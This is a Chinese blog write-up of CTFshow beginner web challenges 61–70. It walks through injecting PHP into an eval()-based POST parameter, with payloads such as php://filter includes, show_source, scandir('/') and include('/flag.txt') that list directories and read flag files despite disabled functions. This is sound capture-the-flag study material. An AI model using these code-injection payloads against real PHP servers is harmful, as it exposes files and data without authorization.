《CTFshow-Web入门》07. Web 61~70

已于 2023-09-01 09:19:44 修改
阅读量1.1k 收藏 3
点赞数 2
分类专栏: WriteUp:CTF练习 文章标签: 前端 php 服务器
于 2023-04-30 14:45:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KeepPromise/article/details/130448475
版权

Web 入门

ctf - web入门

索引

  • web61~70:post 请求之 eval() 利用。

web61~65

题解

这几个题都和 web58 一样。可能内部禁用的函数不一样吧。但 payload 都差不多。不多解释了。

在这里插入图片描述

以下解法随便挑一个即可。可能不同题会有部分函数被禁。

payload1

c=include "php://filter/read=convert.base64-encode/resource=flag.php";

payload2

c=show_source('flag.php');

payload3

c=file_get_contents('flag.php');

payload4

c=highlight_file("flag.php");

在这里插入图片描述

web66

题解

题目没变化。

在这里插入图片描述

随便试一个函数。

在这里插入图片描述

根据提示,先扫一下根目录。

c=print_r(scandir('/'));

在这里插入图片描述

可得 payload:

c=highlight_file("/flag.txt");

原理

PHP 中:

  • scandir():扫描目录。

web67

题解

题目就不贴了。和前几题一模一样的。

区别在于,print_r() 函数被禁了。

那就用 var_dump() 函数。

c=var_dump(scandir('/'));

在这里插入图片描述

payload

c=highlight_file("/flag.txt");

原理

  • var_dump():打印变量的相关信息

web68

题解

一上来就说 highlight_file() 函数被禁了。

在这里插入图片描述

先尝试扫一下根目录。

c=var_dump(scandir('/'));

在这里插入图片描述

那就使用 include() 函数将文件内容包含进来。

payload

c=include("/flag.txt");

原理

  • include():表达式包含并运行指定文件。

web69

题解

题目与 web68 一样。

但是 var_dump() 被禁了。

换一个函数即可。

c=var_export(scandir("/"));

在这里插入图片描述

payload

c=include("/flag.txt");

原理

  • var_export:输出或返回变量的可解析字符串表示。

web70

题解

看题,禁用了一堆函数。

在这里插入图片描述

但其实沿用 web69 的方法即可。

c=var_export(scandir("/"));

c=include("/flag.txt");

原理

  • error_reporting():设置应该报告何种 PHP 错误。
  • ini_set():配置选项设置值。

对这题来说没啥用的函数。

一笑出门去,千里落花风。

——《水调歌头 · 我饮不须劝》(宋)辛弃疾

永别了,赛艾斯滴恩
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web61
m0_69289738的博客
09-18 63
show_source是highlight_flie()的别名。show_source() 函数对文件进行语法高亮显示。使用show_source("flag.php");
CTFshow 命令执行 web61
Kradress的博客
12-03 130
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
CTFshow 命令执行 web70
Kradress的博客
12-04 210
目录源码思路题解 源码 Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been disabl
用CTFShow例题练习命令执行web61-web70
qq_54502707的博客
04-23 388
大家好,这里是KOKO师傅~ 今天和大家一起来继续做CTFShow关于命令执行的题目!
CTFshow web入门 web56~web70 命令执行
qq_56815564的博客
04-18 618
这回倒好,直接告诉你不能用highlight_file()了,根据上面一堆题目的源码,可以明确的一点就是else里的那个highlight_file()被禁用的原因才导致的报错,即不能使用highlight_file()事先说明一下,eval函数的作用是获取返回值,所以传入导eval中的数据需要是一个有返回值的函数,要不就是一段小程序也行。再次发现根目录下的,flag.txt,直接进得到。
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
BUUCTF pwn wp 61 - 65
fa1c4的blog
11-16 493
hitcontraining_heapcreator heap菜单题, 四个函数逆一下, 发现在edit_heap中的read_input函数有off-by-one unsigned __int64 edit_heap() { int v1; // [rsp+Ch] [rbp-14h] char buf[8]; // [rsp+10h] [rbp-10h] BYREF unsigned __int64 v3; // [rsp+18h] [rbp-8h] v3 = __readfsqwor
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 3344
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
web渗透--61--web服务器解析漏洞
武天旭的博客
09-23 1488
1、漏洞描述: 服务器相关中间件存在一些解析漏洞,攻击者可通过上传一定格式的文件,被服务器的中间件进行了解析,这样就对系统造成一定危害。常见的服务器解析漏洞涉及的中间件有IIS,apache、nginx等。 2、检测方法 以下为常见的各大web服务器所出现过的解析漏洞汇总,在检测时刻参考:
ctfshow web入门 命令执行web59-63
m0_62207170的博客
04-07 152
ctfshow web入门命令执行web59-63
ctfshow-web命令执行(web61-77;118-124)(Updating)
m0_50268414的博客
11-30 2704
ctfshow-web命令执行(web61-77;118-124) 文章目录ctfshow-web命令执行(web61-77;118-124)web66 print\_r(scandir())与highlight\_file()web68 includeweb69 exit() web66 print_r(scandir())与highlight_file() 题目描述 show_source('flag.php'); 该语句被过滤 题解 POST传入c=print_r(scandir(’/’)); 获得
ctfshow-web入门-命令执行(web59-web65)
最新发布
Welcome To Myon'Blog !
06-30 243
都是使用 highlight_file 或者 show_source。
CTFshow web56 57 58 59 60-65
ChenD的学习笔记
11-12 919
CTFshow web56 web57 web58 web59 web60 web61 web62 web63 web64 web65
ctfshow web入门58-77(命令执行 bypass禁用函数和访问目录)
Firebasky的博客
09-18 1772
1. web58-65 payload:c=show_source('flag.php'); 2. web66 1.查看flag文件 c=print_r(scandir("/")); c=highlight_file('/flag.txt'); 3. web67 盲猜 c=highlight_file('/flag.txt'); 4. web68-70 尝试include('index.php'); 发现字节太大了 直接盲猜c=include('/flag.txt'); 5. web71 <?php
CTF命令执行
qq_45086218的博客
03-02 2673
文章目录通配符*号?号常用命令其他姿势 本文以ctf.show网站题目为例,总结ctf中的命令执行姿势 通配符 if(!preg_match("/flag/i", $c)){ eval($c); } *号 c=system('cat *.php'); c=system('cat f*'); ?号 c=system('cat fla?????'); c=system('cat f?????hp'); 常用命令 system() passthru() exec() shell_e
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值